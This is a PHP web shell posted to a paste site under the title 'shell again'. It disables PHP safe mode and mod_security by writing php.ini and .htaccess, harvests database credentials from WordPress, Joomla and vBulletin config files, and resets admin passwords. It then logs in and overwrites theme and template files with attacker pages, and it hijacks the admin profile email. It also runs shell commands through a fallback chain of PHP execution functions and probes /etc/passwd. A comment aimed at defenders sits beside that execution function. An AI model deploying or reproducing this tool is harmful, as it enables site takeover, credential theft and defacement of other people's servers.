AZZATSSINS_CYBERSERK

shell again

Jun 28th, 2016
  1. <?php
  2. @ini_set('error_log',NULL);
  3.  
  4. @ini_set('log_errors',0);
  5.  
  6. @ini_set('max_execution_time',0);
  7.  
  8. @set_time_limit(0);
  9.  
  10. @set_magic_quotes_runtime(0);
  11.  
  12. $enable_wp = true;
  13.  
  14. $enable_joomla = true;
  15.  
  16. $enable_vb = false;
  17.  
  18. $enable_phpbb = false;
  19.  
  20. $enable_ipb = false;
  21.  
  22. if(isset($_SESSION['safechk'])){
  23.  
  24. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
  25.  
  26. $byphp = "safe_mode = Off
  27.  
  28. disable_functions =
  29. NONE
  30.  
  31. safe_mode_gid = OFF
  32.  
  33. open_basedir = OFF
  34.  
  35. allow_url_fopen = On";
  36.  
  37. $byht = "<IfModule mod_security.c>
  38.  
  39. SecFilterEngine Off
  40.  
  41. SecFilterScanPOST Off
  42.  
  43. SecFilterCheckURLEncoding Off
  44.  
  45. SecFilterCheckUnicodeEncoding Off
  46.  
  47. </IfModule>";
  48.  
  49. file_put_contents("php.ini",$byphp);
  50.  
  51. file_put_contents(".htaccess",$byht);
  52.  
  53. $_SESSION['safechk'] = "done";
  54.  
  55. die("PHP Safe Mode ByPassed. Please Refresh This page");
  56.  
  57. }
  58.  
  59. }
  60.  
  61. function convertByte($s) {
  62.  
  63. if($s >= 1073741824)
  64.  
  65. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  66.  
  67. elseif($s >= 1048576)
  68.  
  69. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  70.  
  71. elseif($s >= 1024)
  72.  
  73. return sprintf('%1.2f',$s / 1024 ) .' KB';
  74.  
  75. else
  76.  
  77. return $s .' B';
  78.  
  79. }
  80.  
  81. function curPageURL() {
  82.  
  83. $pageURL = 'http';
  84.  
  85. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  86.  
  87. $pageURL .= "://";
  88.  
  89. if ($_SERVER["SERVER_PORT"] != "80") {
  90.  
  91. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  92.  
  93. }else {
  94.  
  95. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  96.  
  97. }
  98.  
  99. return $pageURL;
  100.  
  101. }
  102.  
  103. function chkDis($link,$str){
  104.  
  105. $lol = get_headers($link,1);
  106.  
  107. if(strpos($lol[0],"200")){
  108.  
  109. $nan = file_get_contents($link);
  110.  
  111. if(strpos($nan,$str)){
  112.  
  113. return true;
  114.  
  115. }else{return false;}
  116.  
  117. }else{return false;}
  118.  
  119. }
  120.  
  121. function getDnamed(){
  122.  
  123. if(is_readable("/var/named")){
  124.  
  125. $list = scandir("/var/named");
  126.  
  127. foreach($list as $domain){
  128.  
  129. if(strpos($domain,".db")){
  130.  
  131. $i += 1;
  132.  
  133. $domain = str_replace('.db','',$domain);
  134.  
  135. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  136.  
  137. $dn[$owner['name']] = $domain;
  138.  
  139. }
  140.  
  141. }
  142.  
  143. }
  144.  
  145. return $dn;
  146.  
  147. }
  148.  
  149. function chkSys($link){
  150.  
  151. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
  152.  
  153. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
  154.  
  155. );
  156.  
  157. foreach($sys_arr as $k=>$dan){
  158.  
  159. if(chkDis($link.$dan['l'],$dan['s'])){
  160.  
  161. return array('link'=>$link.$dan['l'],'cms'=>$k);
  162.  
  163. }
  164.  
  165. }
  166.  
  167. }
  168.  
  169. function EloFind($str,$start,$end){
  170.  
  171. $len = strlen($str);
  172.  
  173. $start_pos = (strpos($str,$start) +strlen($start));
  174.  
  175. $str = substr($str,$start_pos);
  176.  
  177. $end_pos = strpos($str,$end);
  178.  
  179. $str = substr($str,0,$end_pos);
  180.  
  181. return $str;
  182.  
  183. }
  184.  
  185. function GetPage($url,$cookie,$post = null,$head = true) {
  186.  
  187. $ch = curl_init();
  188.  
  189. curl_setopt($ch,CURLOPT_URL,$url);
  190.  
  191. curl_setopt($ch,CURLOPT_HEADER,$head);
  192.  
  193. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  194.  
  195. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  196.  
  197. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
  198.  
  199. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
  200.  
  201. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
  202.  
  203. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
  204.  
  205. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
  206.  
  207. If ($post != NULL){
  208.  
  209. curl_setopt($ch,CURLOPT_POST,1);
  210.  
  211. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  212.  
  213. }
  214.  
  215. $urlPage = curl_exec($ch);
  216.  
  217. if(curl_errno($ch)){
  218.  
  219. echo curl_error($ch);
  220.  
  221. }
  222.  
  223. curl_close($ch);
  224.  
  225. return($urlPage);
  226.  
  227. }
  228.  
  229. function throwErr($str){
  230.  
  231. $arr = array("status"=>"error","msg"=>$str);
  232.  
  233. die(json_encode($arr));
  234.  
  235. }
  236.  
  237. function add2file($file,$str){
  238.  
  239. if(file_exists($file)){
  240.  
  241. $do = file_get_contents($file);
  242.  
  243. if(!strpos($do,$str)){
  244.  
  245. file_put_contents($file,$str,FILE_APPEND);
  246.  
  247. }
  248.  
  249. }else{
  250.  
  251. file_put_contents($file,$str,FILE_APPEND);
  252.  
  253. }
  254.  
  255. }
  256.  
  257. function doXploitWP($cnf,$html,$npass){
  258.  
  259. $success = false;
  260.  
  261. $str = file_get_contents($cnf);
  262.  
  263. if(preg_match('%DB_USER%',$str)){
  264.  
  265. $username=EloFind($str,"define('DB_USER', '","');");
  266.  
  267. $password=EloFind($str,"define('DB_PASSWORD', '","');");
  268.  
  269. $dbname=EloFind($str,"define('DB_NAME', '","');");
  270.  
  271. $prefix=EloFind($str,"table_prefix  = '","'");
  272.  
  273. $link=mysql_connect("localhost",$username,$password) ;
  274.  
  275. if ($link) {
  276.  
  277. mysql_select_db($dbname,$link) ;
  278.  
  279. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
  280.  
  281. $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  282.  
  283. $data = mysql_fetch_array($req);
  284.  
  285. $site_url=$data["option_value"];
  286.  
  287. }else{
  288.  
  289. throwErr("Mysql Fail");
  290.  
  291. }
  292.  
  293. $status['site'] = $site_url;
  294.  
  295. $cookie = 'cookie/'.md5($cnf).'.txt';
  296.  
  297. @unlink($cookie);
  298.  
  299. $logged_in = true;
  300.  
  301. $url = $site_url."/wp-login.php";
  302.  
  303. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
  304.  
  305. $logme = GetPage($url,$cookie,$postme);
  306.  
  307. if(!preg_match('%logout%',$logme)){
  308.  
  309. file_put_contents("login.txt",$site_url.$logme);
  310.  
  311. throwErr("Login Error");
  312.  
  313. }
  314.  
  315. if($logged_in){
  316.  
  317. $url = $site_url."/wp-admin/theme-editor.php";
  318.  
  319. $themeditor = GetPage($url,$cookie,null);
  320.  
  321. $nola = explode(Chr(10),$themeditor);
  322.  
  323. foreach($nola as $nline){
  324.  
  325. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
  326.  
  327. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
  328.  
  329. }
  330.  
  331. }
  332.  
  333. if(is_array($modify)){
  334.  
  335. foreach($modify as $met=>$indfile){
  336.  
  337. $nri = str_replace('.','_',$met);
  338.  
  339. $nri = "n".$nri;
  340.  
  341. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
  342.  
  343. $indfile =str_replace("&amp;","&",$indfile);
  344.  
  345. $url = trim($site_url."/wp-admin/".$indfile);
  346.  
  347. $themepage = GetPage($url,$cookie,"");
  348.  
  349. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  350.  
  351. $_file = EloFind($themepage,'name="file" value="','"');
  352.  
  353. $nfile = explode('themes',$_file);
  354.  
  355. $jfile = $site_url."/wp-content/themes".end($nfile);
  356.  
  357. $url = $site_url."/wp-admin/theme-editor.php";
  358.  
  359. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
  360.  
  361. $themedied = GetPage($url,$cookie,$postme);
  362.  
  363. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
  364.  
  365. if(!$success){
  366.  
  367. add2file("wp_site.txt",$jfile.Chr(10));
  368.  
  369. }
  370.  
  371. $success = true;
  372.  
  373. if($met == "index.php"){
  374.  
  375. add2file("wp_index.txt",$site_url.Chr(10));
  376.  
  377. }
  378.  
  379. }else{
  380.  
  381. $error = true;
  382.  
  383. }
  384.  
  385. }
  386.  
  387. }
  388.  
  389. }else{
  390.  
  391. throwErr("No file found");
  392.  
  393. }
  394.  
  395. if($success){
  396.  
  397. $url = trim($site_url."/wp-admin/profile.php");
  398.  
  399. $themepage = GetPage($url,$cookie,"");
  400.  
  401. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  402.  
  403. $url = trim($site_url."/wp-admin/profile.php");
  404.  
  405. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=cyberserkers@gmail.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
  406.  
  407. $themepage = GetPage($url,$cookie,$postme);
  408.  
  409. $status['status'] = "success";
  410.  
  411. die(json_encode($status));
  412.  
  413. }
  414.  
  415. else{
  416.  
  417. if($error){
  418.  
  419. throwErr("Could't Update the file");
  420.  
  421. }else{
  422.  
  423. throwErr("Selected file not found");
  424.  
  425. }
  426.  
  427. }
  428.  
  429. }
  430.  
  431. }else{
  432.  
  433. throwErr("Config not found");
  434.  
  435. }
  436.  
  437. return true;
  438.  
  439. }
  440.  
  441. function doXploitJM($cnf,$html,$npass){
  442.  
  443. function joomlaCom($site_url,$cookie,$site){
  444.  
  445. if($_POST['com_install'] == "on"){
  446.  
  447. $url = $site_url ."/index.php?option=com_installer";
  448.  
  449. $compage = GetPage($url,$cookie);
  450.  
  451. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
  452.  
  453. $hash = $dhash[1];
  454.  
  455. preg_match_all('#value="/(.*?)"#s',$compage,$path);
  456.  
  457. foreach($path[0] as $pathx){
  458.  
  459. $pathx=ereg_replace('value="','',$pathx);
  460.  
  461. $pathx=ereg_replace('"','',$pathx);
  462.  
  463. }
  464.  
  465. $dir = getcwd()."/azzatssins.html";
  466.  
  467. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
  468.  
  469. $url = $site_url ."/index.php?option=com_installer";
  470.  
  471. $com_shell = GetPage($url,$cookie,$postme);
  472.  
  473. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
  474.  
  475. add2file("jm_site.txt",$site."/tmp/azzatssins.html".Chr(10));
  476.  
  477. $status['site'] = $site."/tmp/azzatssins.html";
  478.  
  479. $status['status'] = "success";
  480.  
  481. die(json_encode($status));
  482.  
  483. }else{
  484.  
  485. return false;
  486.  
  487. }
  488.  
  489. }
  490.  
  491. return true;
  492.  
  493. }
  494.  
  495. $str = file_get_contents($cnf);
  496.  
  497. if(preg_match('%(JConfig|mosConfig)%',$str)){
  498.  
  499. if(preg_match('%JConfig%',$str)){
  500.  
  501. $username=EloFind($str,"\$user = '","'");
  502.  
  503. $password=EloFind($str,"\$password = '","'");
  504.  
  505. $dbname=EloFind($str,"\$db = '","'");
  506.  
  507. $prefix=EloFind($str,"\$dbprefix = '","'");
  508.  
  509. $pwd = md5($npass);
  510.  
  511. if($_POST['domain'] != "..."){
  512.  
  513. $site_url = $_POST['domain'];
  514.  
  515. $site_url = "http://".$site_url;
  516.  
  517. }else{
  518.  
  519. $mailto = EloFind($str,"\$mailfrom = '","'");
  520.  
  521. $siteul = explode('@',$mailto);
  522.  
  523. $site_url = "http://".$siteul[1];
  524.  
  525. }
  526.  
  527. }elseif(preg_match('%mosConfig%',$str)){
  528.  
  529. $username=EloFind($str,"\$mosConfig_user = '","'");
  530.  
  531. $password=EloFind($str,"\$mosConfig_password = '","'");
  532.  
  533. $dbname=EloFind($str,"\$mosConfig_db = '","'");
  534.  
  535. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
  536.  
  537. $pwd = md5($npass);
  538.  
  539. if($_POST['domain'] != "..."){
  540.  
  541. $site_url = $_POST['domain'];
  542.  
  543. $site_url = "http://".$site_url;
  544.  
  545. }else{
  546.  
  547. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
  548.  
  549. $siteul = explode('@',$mailto);
  550.  
  551. $site_url = "http://".$siteul[1];
  552.  
  553. }
  554.  
  555. }
  556.  
  557. $site = $site_url;
  558.  
  559. $site_url = $site_url."/administrator/";
  560.  
  561. $cookie = 'cookie/'.md5($cnf).'.txt';
  562.  
  563. @unlink($cookie);
  564.  
  565. $link=mysql_connect("localhost",$username,$password) ;
  566.  
  567. if ($link) {
  568.  
  569. mysql_select_db($dbname,$link);
  570.  
  571. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
  572.  
  573. $doit =mysql_query("SELECT * from  `".$prefix."extensions` ");
  574.  
  575. if($doit){
  576.  
  577. if($_POST['ignore_def'] == "on"){
  578.  
  579. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='0'");
  580.  
  581. $data = mysql_fetch_array($req);
  582.  
  583. $template_name=$data["template"];
  584.  
  585. if(strlen($template_name) <1){
  586.  
  587. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  588.  
  589. $data = mysql_fetch_array($req);
  590.  
  591. $template_name=$data["template"];
  592.  
  593. }
  594.  
  595. }
  596.  
  597. else{
  598.  
  599. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  600.  
  601. $data = mysql_fetch_array($req);
  602.  
  603. $template_name=$data["template"];
  604.  
  605. }
  606.  
  607. $req =mysql_query("SELECT * from  `".$prefix."extensions` WHERE name='".$template_name."'");
  608.  
  609. $data = mysql_fetch_array($req);
  610.  
  611. $template_id=$data["extension_id"];
  612.  
  613. $url = $site_url ."index.php";
  614.  
  615. $login_page = GetPage($url,$cookie);
  616.  
  617. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
  618.  
  619. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  620.  
  621. $hash = $dhash[1];
  622.  
  623. $url = $site_url ."index.php";
  624.  
  625. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
  626.  
  627. $logginin = GetPage($url,$cookie,$postme);
  628.  
  629. if(preg_match('%logout|index2\.php%',$logginin)){
  630.  
  631. $logged_in = true;
  632.  
  633. }
  634.  
  635. if(!$logged_in){
  636.  
  637. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
  638.  
  639. throwErr("Login Error");
  640.  
  641. }
  642.  
  643. if($logged_in){
  644.  
  645. joomlaCom($site_url,$cookie,$site);
  646.  
  647. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  648.  
  649. $themepage = GetPage($url,$cookie);
  650.  
  651. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
  652.  
  653. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  654.  
  655. $hash = $dhash[1];
  656.  
  657. $url = $site_url."/index.php?option=com_templates&layout=edit";
  658.  
  659. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
  660.  
  661. $themeedit = GetPage($url,$cookie,$postme);
  662.  
  663. if(preg_match('%class=\"message message\"%',$themeedit)){
  664.  
  665. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  666.  
  667. add2file("jm_index.txt",$site.Chr(10));
  668.  
  669. if($_POST['ignore_def'] == "on"){
  670.  
  671. $status['site'] = $site."/templates/".$template_name."/index.php";
  672.  
  673. }else{
  674.  
  675. $status['site'] = $site;
  676.  
  677. }
  678.  
  679. $status['status'] = "success";
  680.  
  681. die(json_encode($status));
  682.  
  683. }
  684.  
  685. else{
  686.  
  687. throwErr("Update failed");
  688.  
  689. }
  690.  
  691. }
  692.  
  693. else{
  694.  
  695. throwErr("Index not found");
  696.  
  697. }
  698.  
  699. }
  700.  
  701. }else{
  702.  
  703. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
  704.  
  705. $data = mysql_fetch_array($req);
  706.  
  707. $template_name=$data["template"];
  708.  
  709. $url = $site_url ."index.php";
  710.  
  711. $login_page = GetPage($url,$cookie);
  712.  
  713. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  714.  
  715. $hash = $dhash[1];
  716.  
  717. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
  718.  
  719. $url = $site_url ."index.php";
  720.  
  721. $logginin = GetPage($url,$cookie,$postme);
  722.  
  723. if(preg_match('%logout|index2\.php%',$logginin)){
  724.  
  725. $logged_in = true;
  726.  
  727. }
  728.  
  729. if(!$logged_in){
  730.  
  731. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
  732.  
  733. throwErr("Login Error");
  734.  
  735. }
  736.  
  737. if($logged_in){
  738.  
  739. joomlaCom($site_url,$cookie,$site);
  740.  
  741. if(preg_match('%index2\.php%',$logginin)){
  742.  
  743. $url = $site_url ."index2.php";
  744.  
  745. $logginin = GetPage($url,$cookie);
  746.  
  747. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  748.  
  749. $hash = $dhash[1];
  750.  
  751. $url = $site_url ."/index2.php";
  752.  
  753. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
  754.  
  755. $themepage = GetPage($url,$cookie,$postme);
  756.  
  757. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  758.  
  759. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  760.  
  761. $hash = $dhash[1];
  762.  
  763. $url=$site_url."/index2.php";
  764.  
  765. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
  766.  
  767. $themeedit = GetPage($url,$cookie,$postme);
  768.  
  769. if(preg_match('%Template Manager%',$themeedit)){
  770.  
  771. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  772.  
  773. add2file("jm_index.txt",$site.Chr(10));
  774.  
  775. $status['site'] = $site;
  776.  
  777. $status['status'] = "success";
  778.  
  779. die(json_encode($status));
  780.  
  781. }
  782.  
  783. else{
  784.  
  785. file_put_contents("jmupd.txt",$site_url.$themeedit);
  786.  
  787. throwErr($template_name);
  788.  
  789. }
  790.  
  791. }else{
  792.  
  793. throwErr("Index not found");
  794.  
  795. }
  796.  
  797. }
  798.  
  799. else{
  800.  
  801. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  802.  
  803. $hash = $dhash[1];
  804.  
  805. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
  806.  
  807. $themepage = GetPage($url,$cookie);
  808.  
  809. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  810.  
  811. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  812.  
  813. $hash = $dhash[1];
  814.  
  815. $url=$site_url."/index.php?option=com_templates&layout=edit";
  816.  
  817. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
  818.  
  819. $themeedit = GetPage($url,$cookie,$postme);
  820.  
  821. if(preg_match('%class=\"message message fade\"%',$themeedit)){
  822.  
  823. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  824.  
  825. add2file("jm_index.txt",$site.Chr(10));
  826.  
  827. $status['site'] = $site;
  828.  
  829. $status['status'] = "success";
  830.  
  831. die(json_encode($status));
  832.  
  833. }
  834.  
  835. else{
  836.  
  837. file_put_contents("jmupd.txt",$site_url.$themeedit);
  838.  
  839. throwErr($template_name);
  840.  
  841. }
  842.  
  843. }else{
  844.  
  845. throwErr("Index not found");
  846.  
  847. }
  848.  
  849. }
  850.  
  851. }
  852.  
  853. }
  854.  
  855. }
  856.  
  857. else{
  858.  
  859. throwErr("Mysql Fail");
  860.  
  861. }
  862.  
  863. }
  864.  
  865. else{
  866.  
  867. throwErr("Config not found");
  868.  
  869. }
  870.  
  871. }
  872.  
  873. function doXploitVB($cnf,$html){
  874.  
  875. $str = file_get_contents($cnf);
  876.  
  877. if(preg_match('%vBulletin%',$str)){
  878.  
  879. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
  880.  
  881. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
  882.  
  883. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
  884.  
  885. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
  886.  
  887. $link=mysql_connect("localhost",$username,$password) ;
  888.  
  889. if ($link) {
  890.  
  891. mysql_select_db($dbname,$link);
  892.  
  893. $html = str_replace('"','\\\"',$html);
  894.  
  895. $query = "UPDATE template SET template = '".$html."'";
  896.  
  897. $result =@ mysql_query($query);
  898.  
  899. if($result){
  900.  
  901. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
  902.  
  903. $result =@ mysql_query($query);
  904.  
  905. $data = mysql_fetch_array($result);
  906.  
  907. $optionz=$data["data"];
  908.  
  909. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
  910.  
  911. $status['site'] = $site_url;
  912.  
  913. $status['status'] = "success";
  914.  
  915. die(json_encode($status));
  916.  
  917. }else{
  918.  
  919. throwErr("Update Failed");
  920.  
  921. }
  922.  
  923. }else{
  924.  
  925. throwErr("Mysql Fail");
  926.  
  927. }
  928.  
  929. }else{
  930.  
  931. throwErr("Config not found");
  932.  
  933. }
  934.  
  935. }
  936.  
// Runs a shell command through whichever execution primitive the interpreter still
// exposes, probing exec, passthru, system, shell_exec and finally popen in that order,
// and returns the captured output (exec output is joined with "</br>", the rest is raw;
// '' when nothing is available).
// Defender's note: this fallback chain is why listing only one or two of these in
// `disable_functions` does not help — all of them (and proc_open) must be disabled
// together, and any web-facing script invoking them should be alerted on.
function exme($in) {
    $out = '';
    if (function_exists('exec')) {
        @exec($in,$out);
        $out = @join("</br>",$out);
    }elseif (function_exists('passthru')) {
        // passthru/system write straight to the output buffer, so capture via ob_*.
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif (is_resource($f = @popen($in,"r"))) {
        // Last resort: read the process pipe in 1 KiB chunks until EOF.
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
  982.  
  983. if($_POST['ac'] == "secinfo"){
  984.  
  985. if(is_readable("/etc/named.conf")){
  986.  
  987. echo '&raquo; /etc/named.conf is readable.<br />';
  988.  
  989. }else{
  990.  
  991. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  992.  
  993. }
  994.  
  995. if(is_readable("/etc/passwd")){
  996.  
  997. echo '&raquo; /etc/passwd is readable.<br />';
  998.  
  999. }else{
  1000.  
  1001. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  1002.  
  1003. }
  1004.  
  1005. if(is_readable("/etc/valiases")){
  1006.  
  1007. echo '&raquo; /etc/valiases exists';
  1008.  
  1009. if(is_array(scandir("/etc/valiases"))){
  1010.  
  1011. echo ' & scanable';
  1012.  
  1013. }
  1014.  
  1015. echo '.<br />';
  1016.  
  1017. }else{
  1018.  
  1019. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  1020.  
  1021. }
  1022.  
  1023. if(is_readable("/var/named")){
  1024.  
  1025. echo '&raquo; /var/named exists';
  1026.  
  1027. if(is_array(scandir("/var/named"))){
  1028.  
  1029. echo ' & scanable';
  1030.  
  1031. }
  1032.  
  1033. echo '.<br />';
  1034.  
  1035. }else{
  1036.  
  1037. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  1038.  
  1039. }
  1040.  
  1041. if(ini_get('disable_functions')){
  1042.  
  1043. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  1044.  
  1045. }
  1046.  
  1047. if(function_exists("symlink")){
  1048.  
  1049. echo '&raquo; Symlinking allowed<br />';
  1050.  
  1051. }else{
  1052.  
  1053. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  1054.  
  1055. }
  1056.  
  1057. if(is_writable("/var/tmp")){
  1058.  
  1059. echo '&raquo; /var/tmp folder is writable<br />';
  1060.  
  1061. }
  1062.  
  1063. if(is_readable('/var/log')){
  1064.  
  1065. echo '&raquo; /var/log folder is readable<br />';
  1066.  
  1067. }
  1068.  
  1069. die();
  1070.  
  1071. }
  1072.  
  1073. elseif($_POST['ac'] == "sysinfo"){
  1074.  
  1075. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
  1076.  
  1077. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
  1078.  
  1079. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
  1080.  
  1081. $ssys = "None";
  1082.  
  1083. if(is_dir("/usr/local/cpanel")){
  1084.  
  1085. $ssys = "Running On Cpanel";
  1086.  
  1087. }elseif(is_dir("/usr/local/directadmin")){
  1088.  
  1089. $ssys = "Running On Directadmin";
  1090.  
  1091. }
  1092.  
  1093. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
  1094.  
  1095. if(function_exists("disk_total_space")){
  1096.  
  1097. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
  1098.  
  1099. }
  1100.  
  1101. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
  1102.  
  1103. die();
  1104.  
  1105. }
  1106.  
  1107. elseif($_POST['ac'] == "browse"){
  1108.  
  1109. error_reporting(0);
  1110.  
  1111. if($_POST['path'] != ""){
  1112.  
  1113. $path = $_POST['path'];
  1114.  
  1115. }else{
  1116.  
  1117. $path = getcwd();
  1118.  
  1119. }
  1120.  
  1121. $filez = scandir($path);
  1122.  
  1123. $q = 2;
  1124.  
  1125. foreach($filez as $mfile){
  1126.  
  1127. if($q == 2){$q = 1;}else{$q = 2;}
  1128.  
  1129. $npath = $_POST['path'].$mfile;
  1130.  
  1131. $stat = stat($npath);
  1132.  
  1133. $usr = posix_getpwuid($stat['uid']);
  1134.  
  1135. $grp = posix_getpwuid($stat['gid']);
  1136.  
  1137. if(is_dir($npath)){
  1138.  
  1139. $size = "Dir";
  1140.  
  1141. }else{
  1142.  
  1143. $size = convertByte($stat['size']);
  1144.  
  1145. }
  1146.  
  1147. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
  1148.  
  1149. if(!$fperm){
  1150.  
  1151. $fperm = "<font color='red'>Restricted</font>";
  1152.  
  1153. }elseif(is_writeable($npath)){
  1154.  
  1155. $fperm = "<font color='#28FE14'>".$fperm."</font>";
  1156.  
  1157. }elseif(is_readable($npath)){
  1158.  
  1159. $fperm = "<font color='yellow'>".$fperm."</font>";
  1160.  
  1161. }
  1162.  
  1163. echo '<div class="filetable">
  1164.  
  1165. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
  1166.  
  1167. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
  1168.  
  1169. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
  1170.  
  1171. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
  1172.  
  1173. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
  1174.  
  1175. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
  1176.  
  1177. </div>';
  1178.  
  1179. }
